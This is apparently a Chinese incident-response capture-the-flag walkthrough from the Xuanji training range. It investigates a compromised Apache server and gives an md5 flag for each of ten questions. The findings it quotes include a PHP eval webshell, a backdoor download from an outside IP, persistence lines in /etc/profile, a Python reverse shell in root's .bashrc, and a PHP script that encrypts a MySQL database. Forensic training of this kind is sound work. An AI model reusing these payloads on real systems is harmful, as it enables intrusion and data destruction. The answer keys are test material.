第九章-blueteam 的小心思 - 第九章 - 应急响应 - 玄机 - 靶场练习

任务环境说明
注：进去后执行 sed -i's/Listen 80/Listen 9999/' /etc/apache2/ports.conf && service apache2 restart

# 题目 1

攻击者通过什么密码成功登录了网站的后台？提交密码字符串的小写 md5 值，格式 flag {md5}。

根目录下有一个 wireshark.pcap 的流量包

wireshark 打开，先过滤 http 请求，然后追踪 http 流，通过关键字 &password 搜索，找到返回为 302 跳转的请求。

密码： Aa12345^

flag: flag{d63edb0e9df4cf411398e3658c0237e0}

# 题目 2

攻击者在哪个 PHP 页面中成功上传了后门文件？例如 upload.php 页面，上传字符串 "upload.php" 的小写 md5 值，格式 flag {md5}。

root@ubuntu18:~# cat /var/log/apache2/access.log* | grep "upload"

192.168.16.43 - - [18/Nov/2023:23:21:04 +0000] "POST /pluginmgr.php?op=upload HTTP/1.1" 302 39309 "http://192.168.18.24/pluginmgr.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"

名称： pluginmgr.php

flag： flag{b05c0be368ffa72e6cb2df7e1e1b27be}

# 题目 3

找到攻击者上传的 webshell 文件，提交该文件的小写 md5 值，格式 flag {md5}。

http 流里面没有

通过常用一句话搜索：

	root@ubuntu18:~# grep -rw "eval(\$_POST" /var/www/html/
	/var/www/html/plugins/cpg.php:<?php @eval($_POST["m3"]);?>
	root@ubuntu18:~# md5sum /var/www/html/plugins/cpg.php
	a097b773ced57bb7d51c6719fe8fe5f5 /var/www/html/plugins/cpg.php

flag: flag{a097b773ced57bb7d51c6719fe8fe5f5}

# 题目 4

攻击者后续又下载了一个可执行的后门程序，提交该文件的小写 md5 值，格式 flag {md5}。

	root@ubuntu18:~# cat /var/log/apache2/error.log* \| grep "http://"
	--2023-11-18 23:21:43-- http://124.221.70.199:8889/is.world
	root@ubuntu18:~# find / -name "is.world" 2>/dev/null
	/var/www/html/plugins/. /is.world
	root@ubuntu18:~# md5sum "/var/www/html/plugins/. /is.world"
	ee279c39bf3dcb225093bdbafeb9a439 /var/www/html/plugins/. /is.world

flag: flag{ee279c39bf3dcb225093bdbafeb9a439}

# 题目 5

攻击者创建了后门用户的名称是？例如 attack 恶意用户，上传字符串 "attack" 的小写 md5 值，格式 flag {md5}。

	root@ubuntu18:~# cat /etc/passwd \| tail
	messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
	_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
	lxd:x:105:65534::/var/lib/lxd/:/bin/false
	uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
	dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
	landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
	pollinate:x:109:1::/var/cache/pollinate:/bin/false
	sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
	mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false
	knowledgegraphd:x:0:0::/home/knowledgegraphd:/bin/bash

	root@ubuntu18:~# chage -l knowledgegraphd
	Last password change : Nov 18, 2023
	Password expires : never
	Password inactive : never
	Account expires : never
	Minimum number of days between password change : 0
	Maximum number of days between password change : 99999
	Number of days of warning before password expires : 7

	root@ubuntu18:~# echo -n "knowledgegraphd" \| md5sum
	4cda3461543c9a770a3349760594facd -

flag: flag{4cda3461543c9a770a3349760594facd}

# 题目 6

攻击者创建了一个持久化的配置项，导致任意用户登录就会触发后门的连接。提交该配置项对应配置文件的小写 md5 值，格式 flag {md5}。

	root@ubuntu18:~# cat /etc/profile
	# /etc/profile: system-wide .profile file for the Bourne shell (sh(1))
	# and Bourne compatible shells (bash(1), ksh(1), ash(1), ...).

	if [ "${PS1-}" ]; then
	if [ "${BASH-}" ] && [ "$BASH" != "/bin/sh" ]; then
	# The file bash.bashrc already sets the default PS1.
	# PS1='\h:\w\$ '
	if [ -f /etc/bash.bashrc ]; then
	. /etc/bash.bashrc
	fi
	else
	if [ "`id -u`" -eq 0 ]; then
	PS1='# '
	else
	PS1='$ '
	fi
	fi
	fi

	/var/www/html/plugins/". "/is.world &
	if [ -d /etc/profile.d ]; then
	for i in /etc/profile.d/*.sh; do
	if [ -r $i ]; then
	. $i
	fi
	done
	unset i
	fi

	root@ubuntu18:~# md5sum /etc/profile
	65bf3e4a9ac90d75ec28be0317775618 /etc/profile

flag: flag{65bf3e4a9ac90d75ec28be0317775618}

# 题目 7

攻击者创建了一个持久化的配置项，导致只有 root 用户登录才会触发后门的连接。提交该配置项对应配置文件的小写 md5 值，格式 flag {md5}。

检查了一下 root 用户目录的 .profile 和 .bashrc

在 .bashrc 中发现恶意 shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("124.221.70.199",9919));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' &

	root@ubuntu18:~# md5sum .bashrc
	4acc9c465eeeb139c194893ec0a8bcbc .bashrc

flag: flag{4acc9c465eeeb139c194893ec0a8bcbc}

# 题目 8

攻击者加密了哪个数据库？提交数据库的文件夹名，例如 user 数据库对应存放位置为 user 文件夹，上传字符串 "user" 的小写 md5 值，格式 flag {md5}。

处理 mysql 下的数据，发现有东西

	root@ubuntu18:~# find /var/lib/mysql/ -name ".php" -o -name ".py" -o -name "*.sh"
	/var/lib/mysql/clockup.php

	<?php
	$currentDate = date("Y-m-d");
	$key = md5($currentDate);
	$iv = substr(hash('sha256', "DeepMountainsGD"), 0, 16);
	$filePath = "/var/lib/mysql/JPMorgan@0020Chase";
	$files = scandir($filePath);
	foreach ($files as $file) {
	if ($file != "." && $file != "..") {
	$fullPath = $filePath . '/' . $file;
	$content = file_get_contents($fullPath);
	$encryptedContent = openssl_encrypt($content, 'aes-256-cbc', $key, 0, $iv);
	file_put_contents($fullPath, $encryptedContent);
	}
	}
	?>

	root@ubuntu18:~# echo -n "JPMorgan@0020Chase" \| md5sum
	0928a5424aa6126e5923980ca103560e -

flag: flag{0928a5424aa6126e5923980ca103560e}

# 题目 9

解密数据库，提交 Harper 用户对应 Areer 的值。提交 Areer 值的小写 md5 值，格式 flag {md5}。

编写解密脚本：

	<?php
	$currentDate = date("Y-m-d");
	$key = md5('2023-11-18');
	$iv = substr(hash('sha256', "DeepMountainsGD"), 0, 16);
	$filePath = "/var/lib/mysql/JPMorgan@0020Chase";
	$files = scandir($filePath);
	foreach ($files as $file) {
	if ($file != "." && $file != "..") {
	$fullPath = $filePath . '/' . $file;
	$encryptedContent = file_get_contents($fullPath);
	$decryptedContent = openssl_decrypt($encryptedContent, 'aes-256-cbc', $key, 0, $iv);
	file_put_contents($fullPath, $decryptedContent);
	}
	}
	?>

	root@ubuntu18:/var/lib/mysql# php decrypt.php
	root@ubuntu18:/var/lib/mysql# mysql -h 127.0.0.1 -u root -p
	Enter password:
	Welcome to the MySQL monitor. Commands end with ; or \g.
	Your MySQL connection id is 2
	Server version: 5.7.42-0ubuntu0.18.04.1 (Ubuntu)

	Copyright (c) 2000, 2023, Oracle and/or its affiliates.

	Oracle is a registered trademark of Oracle Corporation and/or its
	affiliates. Other names may be trademarks of their respective
	owners.

	Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

	mysql> show databases;
	+--------------------+
	\| Database \|
	+--------------------+
	\| information_schema \|
	\| JPMorgan Chase \|
	\| mirage \|
	\| mysql \|
	\| performance_schema \|
	\| sys \|
	+--------------------+
	6 rows in set (0.00 sec)

	mysql> USE `JPMorgan Chase`;
	Database changed
	mysql> show tables;
	+--------------------------+
	\| Tables_in_JPMorgan Chase \|
	+--------------------------+
	\| Balance \|
	\| UserIdentity \|
	+--------------------------+
	2 rows in set (0.00 sec)

	mysql> SELECT * FROM UserIdentity WHERE User = 'Harper';
	+------+--------+-------+
	\| No \| User \| Areer \|
	+------+--------+-------+
	\| 14 \| Harper \| Chef \|
	+------+--------+-------+
	1 row in set (0.01 sec)

	mysql> exit
	Bye
	root@ubuntu18:/var/lib/mysql# echo -n "Chef" \| md5sum
	8fd82b8864d71ed7fa12b59e6e34cd1c -

flag： flag{8fd82b8864d71ed7fa12b59e6e34cd1c}

# 题目 10

因为什么文件中的漏洞配置，导致了攻击者成功执行命令并提权。提交该文件的小写 md5 值，格式 flag {md5}。

	root@ubuntu18:~# cat /etc/sudoers
	#
	# This file MUST be edited with the 'visudo' command as root.
	#
	# Please consider adding local content in /etc/sudoers.d/ instead of
	# directly modifying this file.
	#
	# See the man page for details on how to write a sudoers file.
	#
	Defaults env_reset
	Defaults mail_badpass
	Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

	# Host alias specification

	# User alias specification

	# Cmnd alias specification

	# User privilege specification
	root ALL=(ALL:ALL) ALL
	www-data ALL=(root) NOPASSWD: /bin/systemctl status apache2.service
	# Members of the admin group may gain root privileges
	%admin ALL=(ALL) ALL

	# Allow members of group sudo to execute any command
	%sudo ALL=(ALL:ALL) ALL

	# See sudoers(5) for more information on "#include" directives:

	#includedir /etc/sudoers.d
	root@ubuntu18:~# md5sum /etc/sudoers
	6585817513b0ea96707ebb0d04d6aeff /etc/sudoers

flag： flag{6585817513b0ea96707ebb0d04d6aeff}

靶场玄机应急响应